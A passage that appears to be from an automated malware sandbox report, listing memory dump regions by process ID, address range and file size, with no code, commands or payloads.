                                                                                                                                              • memory/4856-4499-0x000001FE47E40000-0x000001FE47E94000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                336KB

                                                                                                                                              • memory/4856-4473-0x000001FE472C0000-0x000001FE47316000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                344KB

                                                                                                                                              • memory/4856-486-0x000001FE47330000-0x000001FE47435000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/4856-487-0x000001FE47330000-0x000001FE47435000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/4856-485-0x000001FE47330000-0x000001FE4743A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/4856-493-0x000001FE47330000-0x000001FE47435000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/4856-484-0x000001FE2CDE0000-0x000001FE2CE98000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                736KB

                                                                                                                                              • memory/4856-491-0x000001FE47330000-0x000001FE47435000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/5192-13024-0x0000000000F10000-0x00000000013E9000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.8MB

                                                                                                                                              • memory/5584-4546-0x00000000048A0000-0x0000000004BF4000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                3.3MB

                                                                                                                                              • memory/5836-11629-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                304KB

                                                                                                                                              • memory/6040-10221-0x0000000000580000-0x0000000000C31000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.7MB

                                                                                                                                              • memory/6040-12964-0x0000000000580000-0x0000000000C31000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.7MB

                                                                                                                                              • memory/6228-10525-0x0000000004FC0000-0x0000000005314000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                3.3MB

                                                                                                                                              • memory/6228-10558-0x0000000005650000-0x000000000569C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                304KB

                                                                                                                                              • memory/6576-4514-0x00000258C1D80000-0x00000258C1DA2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                136KB

                                                                                                                                              • memory/7060-4498-0x0000000007930000-0x0000000007952000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                136KB

                                                                                                                                              • memory/7060-4484-0x0000000006370000-0x00000000066C4000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                3.3MB

                                                                                                                                              • memory/7060-4469-0x00000000053A0000-0x00000000053D6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                216KB

                                                                                                                                              • memory/7060-4485-0x0000000006970000-0x000000000698E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                120KB

                                                                                                                                              • memory/7060-4486-0x00000000069A0000-0x00000000069EC000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                304KB

                                                                                                                                              • memory/7060-4497-0x0000000006E60000-0x0000000006E7A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                104KB

                                                                                                                                              • memory/7060-4470-0x0000000005A10000-0x0000000006038000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.2MB

                                                                                                                                              • memory/7060-4472-0x0000000006290000-0x00000000062F6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                408KB

                                                                                                                                              • memory/7060-4496-0x0000000006ED0000-0x0000000006F66000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                600KB

                                                                                                                                              • memory/7060-4471-0x00000000060F0000-0x0000000006112000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                136KB